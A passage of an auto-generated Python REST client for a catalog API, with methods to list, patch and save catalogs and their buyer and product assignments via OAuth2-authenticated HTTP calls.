        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str search: Word or phrase to search for.
        :param str search_on: Comma-delimited list of fields to search on.
        :param str sort_by: Comma-delimited list of fields to sort by.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
        :return: ListCatalog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/catalogs'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'search' in params:
            query_params['search'] = params['search']
        if 'search_on' in params:
            query_params['searchOn'] = params['search_on']
        if 'sort_by' in params:
            query_params['sortBy'] = params['sort_by']
        if 'page' in params:
            query_params['page'] = params['page']
        if 'page_size' in params:
            query_params['pageSize'] = params['page_size']
        if 'filters' in params:
            query_params['filters'] = params['filters']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ListCatalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def list_assignments(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_assignments(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str buyer_id: ID of the buyer.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :return: ListCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_assignments_with_http_info(**kwargs)
        else:
            (data) = self.list_assignments_with_http_info(**kwargs)
            return data

    def list_assignments_with_http_info(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_assignments_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str buyer_id: ID of the buyer.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :return: ListCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'buyer_id', 'page', 'page_size']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_assignments" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/catalogs/assignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'catalog_id' in params:
            query_params['catalogID'] = params['catalog_id']
        if 'buyer_id' in params:
            query_params['buyerID'] = params['buyer_id']
        if 'page' in params:
            query_params['page'] = params['page']
        if 'page_size' in params:
            query_params['pageSize'] = params['page_size']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ListCatalogAssignment',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def list_product_assignments(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_product_assignments(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str product_id: ID of the product.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :return: ListProductCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_product_assignments_with_http_info(**kwargs)
        else:
            (data) = self.list_product_assignments_with_http_info(**kwargs)
            return data

    def list_product_assignments_with_http_info(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_product_assignments_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str product_id: ID of the product.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :return: ListProductCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'product_id', 'page', 'page_size']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_product_assignments" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/catalogs/productassignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'catalog_id' in params:
            query_params['catalogID'] = params['catalog_id']
        if 'product_id' in params:
            query_params['productID'] = params['product_id']
        if 'page' in params:
            query_params['page'] = params['page']
        if 'page_size' in params:
            query_params['pageSize'] = params['page_size']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ListProductCatalogAssignment',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def patch(self, catalog_id, partial_catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch(catalog_id, partial_catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog partial_catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_with_http_info(catalog_id, partial_catalog, **kwargs)
        else:
            (data) = self.patch_with_http_info(catalog_id, partial_catalog, **kwargs)
            return data

    def patch_with_http_info(self, catalog_id, partial_catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_with_http_info(catalog_id, partial_catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog partial_catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'partial_catalog']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `patch`")
        # verify the required parameter 'partial_catalog' is set
        if ('partial_catalog' not in params) or (params['partial_catalog'] is None):
            raise ValueError("Missing the required parameter `partial_catalog` when calling `patch`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'partial_catalog' in params:
            body_params = params['partial_catalog']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save(self, catalog_id, catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save(catalog_id, catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_with_http_info(catalog_id, catalog, **kwargs)
        else:
            (data) = self.save_with_http_info(catalog_id, catalog, **kwargs)
            return data

    def save_with_http_info(self, catalog_id, catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_with_http_info(catalog_id, catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'catalog']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `save`")
        # verify the required parameter 'catalog' is set
        if ('catalog' not in params) or (params['catalog'] is None):
            raise ValueError("Missing the required parameter `catalog` when calling `save`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'catalog' in params:
            body_params = params['catalog']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save_assignment(self, catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_assignment(catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CatalogAssignment catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_assignment_with_http_info(catalog_assignment, **kwargs)
        else:
            (data) = self.save_assignment_with_http_info(catalog_assignment, **kwargs)
            return data

    def save_assignment_with_http_info(self, catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_assignment_with_http_info(catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CatalogAssignment catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_assignment']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save_assignment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_assignment' is set
        if ('catalog_assignment' not in params) or (params['catalog_assignment'] is None):
            raise ValueError("Missing the required parameter `catalog_assignment` when calling `save_assignment`")

        resource_path = '/catalogs/assignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'catalog_assignment' in params:
            body_params = params['catalog_assignment']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save_product_assignment(self, product_catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_product_assignment(product_catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param ProductCatalogAssignment product_catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs)
        else:
            (data) = self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs)
            return data

    def save_product_assignment_with_http_info(self, product_catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_product_assignment_with_http_info(product_catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param ProductCatalogAssignment product_catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['product_catalog_assignment']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save_product_assignment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'product_catalog_assignment' is set
        if ('product_catalog_assignment' not in params) or (params['product_catalog_assignment'] is None):
            raise ValueError("Missing the required parameter `product_catalog_assignment` when calling `save_product_assignment`")

        resource_path = '/catalogs/productassignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'product_catalog_assignment' in params:
            body_params = params['product_catalog_assignment']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))
nilq/baby-python
python